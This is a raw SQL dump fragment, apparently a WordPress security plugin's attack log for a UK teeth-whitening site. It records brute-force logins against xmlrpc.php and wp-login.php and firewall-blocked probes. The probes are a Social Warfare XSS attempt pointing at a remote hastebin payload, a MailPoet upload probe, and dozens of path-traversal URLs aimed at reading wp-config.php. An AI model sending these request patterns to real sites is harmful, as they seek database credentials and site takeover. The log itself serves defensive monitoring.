Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7982,0.000000,1629494558.781739,'\0\0\0\0\0\0\0\0\0\0��4ʎ�',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'adlene\'',NULL),(7983,0.000000,1629495170.718066,'\0\0\0\0\0\0\0\0\0\0��Ǩf�',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(7984,0.000000,1629495249.893381,'\0\0\0\0\0\0\0\0\0\0��g�y�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7985,0.000000,1629495709.917679,'\0\0\0\0\0\0\0\0\0\0��k�-:',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0','loginFailInvalidUsername',NULL,NULL),(7986,0.000000,1629496035.750325,'\0\0\0\0\0\0\0\0\0\0���w',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7987,0.000000,1629496266.503452,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7988,0.000000,1629496269.158691,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7989,0.000000,1629496274.860000,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7990,0.000000,1629496282.585260,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7991,0.000000,1629496290.869492,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7992,0.000000,1629496297.449476,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7993,0.000000,1629496303.780109,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7994,0.000000,1629496308.179051,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7995,0.000000,1629496319.616058,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7996,0.000000,1629496329.868216,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7997,0.000000,1629496335.151271,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7998,0.000000,1629496342.515381,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7999,0.000000,1629496345.763910,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(8000,0.000000,1629496347.394168,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(8001,0.000000,1629496351.000088,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(8002,0.000000,1629496353.215110,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(8003,1629496355.132030,1629496354.617200,'\0\0\0\0\0\0\0\0\0\0��4�:m',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//wp-login.php','https://teethwhiteningproduct.co.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(8004,0.000000,1629496647.736024,'\0\0\0\0\0\0\0\0\0\0���]��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(8005,0.000000,1629496872.035670,'\0\0\0\0\0\0\0\0\0\0���q\0�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8006,0.000000,1629497713.465449,'\0\0\0\0\0\0\0\0\0\0��3�e2',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8007,0.000000,1629498531.880071,'\0\0\0\0\0\0\0\0\0\0���@w�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(8008,1629498846.366014,1629498846.295600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8009,1629498855.036835,1629498854.900500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(8010,1629498875.932318,1629498875.865700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(8011,1629498875.221666,1629498875.155700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8012,1629498874.588250,1629498874.492000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8013,1629498873.863088,1629498873.775600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8014,1629498873.039112,1629498872.972600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(8015,1629498872.453469,1629498872.385400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8016,1629498871.646986,1629498871.575000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(8017,1629498871.230392,1629498871.128100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(8018,1629498870.204181,1629498870.135100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(8019,1629498869.447367,1629498869.381600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8020,1629498868.771072,1629498868.700400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(8021,1629498868.080165,1629498868.010100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(8022,1629498867.430934,1629498867.338900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(8023,1629498866.711900,1629498866.621400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(8024,1629498865.970513,1629498865.884500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8025,1629498865.284728,1629498865.185500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8026,1629498864.770469,1629498864.686800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(8027,1629498863.577516,1629498863.503800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8028,1629498862.416294,1629498862.321800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(8029,1629498860.883323,1629498860.815800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8030,1629498860.210757,1629498860.126200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8031,1629498859.490732,1629498859.415700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(8032,1629498858.742030,1629498858.649800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - 